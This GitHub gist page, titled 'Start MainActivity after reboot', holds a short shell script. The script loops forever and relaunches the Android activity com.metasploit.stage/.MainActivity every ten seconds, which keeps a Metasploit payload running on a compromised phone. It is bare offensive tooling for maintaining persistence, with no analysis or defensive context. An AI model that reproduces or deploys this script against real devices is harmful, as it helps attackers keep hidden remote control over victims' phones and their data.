Created
May 31, 2018 21:56
-
-
Save RomaniukVadim/a7dfd673e080f2f1dbdd32e303527ade to your computer and use it in GitHub Desktop.
Start MainActivity after reboot
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
while : | |
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity | |
sleep 10 | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment